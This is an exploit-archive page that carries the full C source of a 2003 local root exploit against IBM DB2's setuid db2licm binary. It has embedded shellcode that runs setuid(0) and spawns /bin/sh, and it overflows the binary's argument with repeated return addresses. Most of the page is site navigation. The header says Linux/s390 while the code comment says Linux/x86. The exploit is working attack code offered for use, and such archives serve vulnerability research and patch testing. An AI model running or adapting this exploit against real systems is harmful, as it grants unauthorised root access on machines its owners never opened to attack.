IBM-DB2-db2licm.c

IBM-DB2-db2licm.c: Posted Sep 26, 2003; Authored by Juan Manuel Pascual Escriba | Site concepcion.upv.es; Local root exploit for IBM DB2 Universal Database version 7.2 for Linux/s390 which makes use of the db2licm binary that is setuid by default.; tags | exploit, local, root; systems | linux; advisories | CVE-2003-0758, CVE-2003-0759; SHA-256 | ccb20c18f85e2c98e30d47ca465bac0c1611eb9129899f18dfd2745dcb29c56e; Download | Favorite | View

IBM-DB2-db2licm.c


/* 
  Local Exploit for db2licm 
  IBM db2 v 7.1 Linux/x86 

  vulnerability researched by 
  Juan Manuel Pascual Escriba
  04/08/2003 Barcelona - Spain
  pask@uninet.edu

  https://concepcion.upv.es/~pask

   
 */



char sc[]=
"\x31\xc0"      /* begin setuid (0) */
"\x31\xdb"
"\xb0\x17"
"\xcd\x80"

"\xeb\x1f"
"\x5e"
"\x89\x76\x08"
"\x31\xc0"
"\x88\x46\x07"
"\x89\x46\x0c"
"\xb0\x0b"
"\x89\xf3"
"\x8d\x4e\x08"
"\x8d\x56\x0c"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\x40"
"\xcd\x80"
"\xe8\xdc\xff\xff\xff"
"/bin/sh";


#define STACK_TOP_X86 0xC0000000
#define ALG_MASK 0xfffffff4
#define ADDR 1000
#define DB2LICM "/home/db2inst1/sqllib/adm/db2licm"

#define DFL_ALG 4       

int main(int arc, char **arv){
        char *argv[3];
        char *envp[2];
        unsigned long sc_address, ba=0;
        unsigned char alg = DFL_ALG;
        unsigned long *p;
        unsigned char *q;
        unsigned int i;



        sc_address = STACK_TOP_X86 - 4 - strlen(DB2LICM) - sizeof(sc) - 1;
        printf("shellcode address = 0x%X\n",sc_address);


        if( (sc_address & ALG_MASK) != sc_address ) {
                ba = sc_address - (sc_address & ALG_MASK);
                printf("adding %d trailing bytes to backward align Shellcode to 0x%X\n", ba,
sc_address & ALG_MASK);
                sc_address = STACK_TOP_X86 - 4 - strlen(DB2LICM) - sizeof(sc) - ba - 1;
                printf("new shellcode address = 0x%X\n",sc_address);
        }

        envp[0] = (char*)malloc(sizeof(sc)+strlen("pete=")+1+ba);
        q = envp[0];
        strcpy(q,"pete=");
        q += strlen("pete=");
        memcpy(q,sc,sizeof(sc));
        q += sizeof(sc)-1;
        memset(q,'A',ba);
        q += ba;
        *q = 0;
        envp[1] = 0;

        /* build overflowing arvg[2] */


        printf("using alignment = %d in overflow buffer\n",alg);

        argv[0] = DB2LICM;
  argv[1] = "-a";
        argv[2] = (char*)malloc(ADDR*sizeof(unsigned long)+alg+1);
        memset(argv[2],'A',alg);
        p=(unsigned long*)(argv[2]+alg);
        for(i=0;i<ADDR;i++) {
                *p = sc_address;
                p++;
        };
        *p = 0;
        argv[3] = 0; 

        printf("executing %s ...\n\n",argv[0]);
        execve(argv[0],argv,envp); 


}

Top Authors In Last 30 Days

Red Hat 242 files
Ubuntu 52 files
Debian 22 files
LiquidWorm 15 files
Apple 9 files
Gentoo 8 files
Google Security Research 3 files
Alter Prime 3 files
Pierre Kim 2 files
Jann Horn 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,166)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,960)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,344)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,989)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other

IBM-DB2-db2licm.c

IBM-DB2-db2licm.c

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

IBM-DB2-db2licm.c

Share This

IBM-DB2-db2licm.c

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems